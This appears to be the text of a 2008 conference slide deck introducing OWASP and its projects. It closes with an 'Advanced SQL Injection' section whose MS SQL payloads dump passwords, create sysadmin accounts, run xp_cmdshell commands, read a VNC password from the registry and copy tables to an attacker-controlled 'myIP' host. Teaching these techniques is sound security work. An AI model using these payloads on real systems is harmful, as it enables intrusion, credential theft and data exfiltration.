OWASP an Introduction

OWASP: An Introduction Alessio Marziali December, 2008 alessio.marziali @cyphersec.com

Agenda
What is OWASP?
General Overview of OWASP
OWASP Projects
OWASP Guides
OWASP EU Summit 2008
OWASP Code Crawler
What is Application Security?
Play time, Advanced SQL Injection (fun!)

What is OWASP?
Open Web Application Security Project
The OWASP Foundation is a United States based 501(c)(3) (no profit) entity that provides the infrastructure for the OWASP Community.
Focused primarily on the “back-end” than “web-design” issues.
Promotes secure software development
An open forum for discussion
A free resource for any development team

What is OWASP?
Open Web Application Security Project
Non-profit, volunteer driven organization
All members are volunteers
All work is donated by sponsors
Provide free resources to the community
Publications, Articles, Standards
Testing and Training Software
Local Chapters & Mailing Lists
Supported through sponsorships
Corporate support through financial or project sponsorship
Personal sponsorships from members

OWASP Sponsors

What is OWASP?
What do they provide?
Publications
OWASP Top 10
OWASP Guide to Building Secure Web Applications
Software (just most important)
WebGoat
WebScarab
.NET Projects
Local Chapters
Community Orientation

OWASP Publications
Major Publications
Top 10 Web Application Security Vulnerabilities
G uide to Building Secure Web Applications
Testing Project
AppSec Faq

OWASP Publications
Common Features
All OWASP publications are available free for download from http://www.owasp.org
Publications are released under GNU “Lesser” GNU Public License agreement, or the GNU Free Documentation License (GFDL)
Living Documents
Updating as needed
Ongoing Projects
OWASP Publications feature collaborative work in a competitive field

OWASP Publications – OWASP TOP 10
Top 10 Web Application Security Vulnerabilities
A list of the 10 most severe security issues
Updated on a yearly basis
Address issues with applications on the perimeter
Growing industry acceptance
Federal Trade Commission (US Gov)
NSA – National Security Agency (US Gov)
US Defense Information Systems Agency
VISA (Cardholder Information Security Program)
British Telecom
Bureau of Alcohol, Tobacco, and Firearms (ATF)

OWASP Publications - OWASP TOP 10

OWASP Publications - OWASP Guides
Guide to Building Secure Web Applications
Provides a baseline for developing secure software
Introduction to security in general
Introduction to application level security
Discusses key implementation areas
Architecture
Authentication
Session Management
Access Controls and Authorization
Event Logging
Data Validation
Under continuous development

OWASP Software
Major Applications
WebGoat
WebScarab
.Net Projects

OWASP Software
Common Features
All OWASP software are provided free for download from http://www.owasp.org
Software is released under GNU “Lesser” GNU Public License agreement
Active Projects
Updating as needed
Ongoing Projects
Many maintainers and contributors
OWASP Software is free for download and can be used by individuals or businesses

OWASP Software - WebGoat
WebGoat
Primarily a training application
Provides
An educational tool for learning about application security
A baseline to test security tools against (i.e. known issues)
What is it?
A J2EE web application arranged in “Security Lessons”
Based on Tomcat and JDK 1.5
Oriented to learning
Easy to use
Illustrates credible scenarios
Teaches realistic attacks, and viable solutions

OWASP Software - WebGoat
WebGoat – What can you learn?
A number of constantly growing attacks and solutions
Cross Site Scripting
SQL Injection Attacks
Thread Safety
Field & Parameter Manipulation
Session Hijacking and Management
Weak Authentication Mechanisms
Many more attacks added
Getting the Tools
http://www.owasp.org/software/webgoat.html
Simply download, unzip, and execute

OWASP Software - WebScarab
WebScarab
A framework for analyzing HTTP/HTTPS traffic
Written in Java
Multiple Uses
Developer: Debug exchanges between client and server
Security Analyst: Analyze traffic to identify vulnerabilities
Technical Tool
Focused on software developers
Extensible plug-in architecture
Open source; easy to extend core system
Very powerful tool
Getting the Tool
http://www.owasp.org/software/webscarab.html

OWASP Software - WebScarab
What can it do?
Features
Fragment Analysis – extract scripts and html as presented to the browser, instead of source code presented by the browser post render
Proxy – observe traffic between the browser and server, includes the ability to modify data in transit, expose hidden fields, and perform bandwidth manipulation
BeanShell – the ability to execute Java code on requests and responses before being transmitted between the browser and server; allows runtime extension of WebScarab
Spider – identifies new URLs within each page viewed
SessionID Analysis – Collection and analysis of cookies to determine predictability of session tokens
Much more…

OWASP Software - .NET Projects
.Net Projects
A collection of tools focused on securing ASP.NET projects
Include security analyzers and documentation projects
Current Projects
Asp.Net Baseline Security – a suite of tools to assist administrators in identifying common issues in Asp.Net deployments
SAM’SHE – Security Analyzer for Microsofts Shared Hosting Environments – toolkit for administrators to identify issues in IIS 5 or 6 Asp.Net deployments
ANSA – Asp.Net Security Analyzer written in C# to identify configuration and software issues that impact security
Asp.Net Security Guides – a set of documents covering the design and deployment of secure software in Asp.Net hosting environments
http://www.owasp.org/software/dotnet.html

OWASP Local Chapters
What do we have to offer?
Monthly Meetings
An opportunity to listen to monthly presentations introducing OWASP (prior to regular meetings)
An opportunity to attend special presentations focused on OWASP projects, and focusing on specific areas of interest
An opportunity to work with organizers to show additional presentations and develop workshops to address specific issues
An open environment for discussion of information security suitable for novices, professionals, and experts
Free Drinks !!!!!

"ALGARVE, PORTUGAL, November 7, 2008 – The Open Web Application Security Project (OWASP) today announced results from the annual OWASP Summit. Over 80 application security experts from over 20 countries joined forces to identify, coordinate, and prioritize our 2009 efforts to create a more secure Internet .“

OWASP Summer of Code 2008 Sponsored Projects
SETTING THE WEB APPLICATION SECURITY AGENDA FOR 2009 3th - 7th November 2008

OWASP Code Crawler Project

More about Code Crawler
Fast Scan
1000~ lines of code (~ 3 seconds to review)
Multi Languages Support
.NET (C#,VB, don’t say F#!)
Java
Integrated Editor
Visual Studio Like visualisation
C# Code colouring
Even “#region” are supported

Technologies used
.NET Framework 3.5 SP1
C# 3.0
Windows Forms
XSLT
Workflow Foundation
Microsoft Charts
XML/XPath

Why We have to change the way we think

Myth
Myth: “We are secure because we have a firewall ”
75% of Internet Vulnerabilities are at Web Application Layer *
*GartnerGroup (2002 report)

Source: Jeremiah Grossman, BlackHat 2001 Myth

Myth 2 – “We are secure because we use SSL”
Only secures data in transit
Does not solve vulnerabilities on:
Web server
Software
Browser
Myth

Source: Jeremiah Grossman, BlackHat 2001 Myth

Myth Firewall Hardened OS Web Server App Server Firewall Databases Legacy Systems Web Services Directories Human Resrcs Billing Custom Developed Application Code APPLICATION ATTACK You can’t use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks Network Layer Application Layer Your security “perimeter” has huge holes at the application layer

What is Web Application Security?

Web Application Security
Combination of
People ,
Processes ,
and Technology
to identify, measure, and manage
Risk
(*) Commercial Of The Shelf

What is Web Application (in)Security?

What is SQL Injection?
The ability to inject SQL commands into the database engine through an existing application

How does SQL Injection work?
Common vulnerable login query
SELECT * FROM users
WHERE login = ' victor '
AND password = ' 123 '
(If it returns something then login!)
Pseudo Code MS SQL Server login syntax
var sql = " SELECT * FROM users
WHERE login = ' " + formusr +
" ' AND password = ' " + formpwd + " ' ";

SQL Injection Testing Methodology 1) Input Validation 2) Info. Gathering 6) OS Cmd Prompt 7) Expand Influence 4) Extracting Data 3) 1=1 Attacks 5) OS Interaction

Some differences MS SQL T-SQL MySQL Access Oracle PL/SQL DB2 Postgres PL/pgSQL Concatenate Strings ' '+' ' concat (" ", " ") " "&" " ' '||' ' " "+" " ' '||' ' Null replace I s null() I f null() Iff ( I s null ()) I f null() I f null () COALESCE() Position CHARINDEX LOCATE() InStr() InStr() InStr() TEXTPOS() Op Sys interaction xp_cmdshell select into outfile / dumpfile #date# utf_file import from export to Call Cast Yes No No No Yes Yes

More differences… MS SQL MySQL Access Oracle DB2 Postgres UNION Y Y Y Y Y Y Subselects Y N 4.0 Y 4.1 N Y Y Y Batch Queries Y N* N N N Y Default stored procedures Many N N Many N N Linking DBs Y Y N Y Y N

Enumerating table columns in different DBs
MS SQL
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename ')
sp_columns tablename (this stored procedure can be used instead)
MySQL
show columns from tablename
Oracle
SELECT * FROM all_tab_columns WHERE table_name=' tablename '
DB2
SELECT * FROM syscat.columns WHERE tabname= ' tablename '
Postgres
SELECT attnum,attname from pg_class, pg_attribute WHERE relname= ' tablename ' AND pg_class.oid=attrelid AND attnum > 0

4) Extracting Data 4) Extracting Data 1) Input Validation 5) OS Interaction 6) OS Cmd Prompt 7) Expand Influence 2) Info. Gathering 3) 1=1 Attacks

Password grabbing
Grabbing username and passwords from a User Defined table
'; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+ login +'/'+ password +' ' from users where login>@var select @var as var into temp end --
' and 1 in (select var from temp) --
' ; drop table temp --

Create DB Accounts
MS SQL
exec sp_addlogin ' victor ', ' Pass123 '
exec sp_addsrvrolemember 'victor', 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES (' victor ', 'localhost', PASSWORD(' Pass123 '))
Access
CREATE USER victor IDENTIFIED BY ' Pass123 '
Postgres (requires UNIX account)
CREATE USER victor WITH PASSWORD ' Pass123 '
Oracle
CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
GRANT CONNECT TO victor ;
GRANT RESOURCE TO victor ;

Grabbing MS SQL Server Hashes
An easy query:
SELECT name, password FROM sysxlogins
But, hashes are varbinary
To display them correctly through an error message we need to Hex them
And then concatenate all
We can only fit 70 name/password pairs in a varchar
We can only see 1 complete pair at a time
Password field requires dbo access
With lower privileges we can still recover user names and brute force the password

Transfer DB structure and data
Once network connectivity has been tested
SQL Server can be linked back to the attacker's DB by using OPENROWSET
DB Structure is replicated
Data is transferred
It can all be done by connecting to a remote port 80 (HTTP)!

Transfer DB
'; insert into
OPENROWSET('SQLoledb',
'uid= sa ;pwd= Pass123 ;Network=DBMSSOCN;Address= myIP , 80 ;',
'select * from mydatabase..table1 ')
select * from database..table1 --
'; insert into
OPENROWSET('SQLoledb',
'uid= sa ;pwd= Pass123 ;Network=DBMSSOCN;Address= myIP , 80 ;',
'select * from mydatabase..table2 ')
select * from database..table2 --

5) OS Interaction 5) OS Interaction 6) OS Cmd Prompt 7) Expand Influence 1) Input Validation 2) Info. Gathering 3) 1=1 Attacks 4) Extracting Data

Interacting with the OS
Two ways to interact with the OS:
Reading and writing system files from disk
Find passwords and configuration files
Change passwords and configuration
Execute commands by overwriting initialization or configuration files
Direct command execution
We can do anything
Both are restricted by the database's running privileges and permissions

MS SQL OS Interaction
MS SQL Server
'; exec master..xp_cmdshell 'ipconfig > test.txt' --
'; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' --
'; begin declare @data varchar(8000) ; set @data='| ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end --
' and 1 in (select substring(x,1,256) from temp) --
'; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --

Gathering IP information through reverse lookups
Reverse DNS
'; exec master..xp_cmdshell 'nslookup a.com MyIP ' --
Reverse Pings
'; exec master..xp_cmdshell 'ping MyIP ' --
OPENROWSET
'; select * from OPENROWSET( 'SQLoledb', 'uid= sa ; pwd= Pass123 ; Network=DBMSSOCN; Address= MyIP , 80 ;', 'select * from table')

Network Reconnaissance
Using the xp_cmdshell all the following can be executed:
Ipconfig /all
Tracert myIP
arp -a
nbtstat -c
netstat -ano
route print

6) OS Cmd Prompt 7) Expand Influence 3) 1=1 Attacks 4) Extracting Data 1) Input Validation 2) Info. Gathering 5) OS Interaction 6) OS Cmd Prompt

Retrieving VNC Password from Registry
'; declare @out binary(8) exec master..xp_regread @rootkey =' HKEY_LOCAL_MACHINE ', @key =' SOFTWAREORLWinVNC3Default ', @value_name =' Password ', @value = @out output select cast(@out as bigint) as x into TEMP--
' and 1 in ( select cast(x as varchar) from temp) --

Links
A lot of SQL Injection related papers
http://www.nextgenss.com/papers.htm
http://www.spidynamics.com/support/whitepapers/
http://www.appsecinc.com/techdocs/whitepapers.html
http://www.atstake.com/research/advisories
Other resources
http://www.owasp.org
http://www.sqlsecurity.com
http://www.securityfocus.com/infocus/1768

OWASP an Introduction

by alessiomarziali

Accessibility

Upload Details

Usage Rights

1 Embed 2

Statistics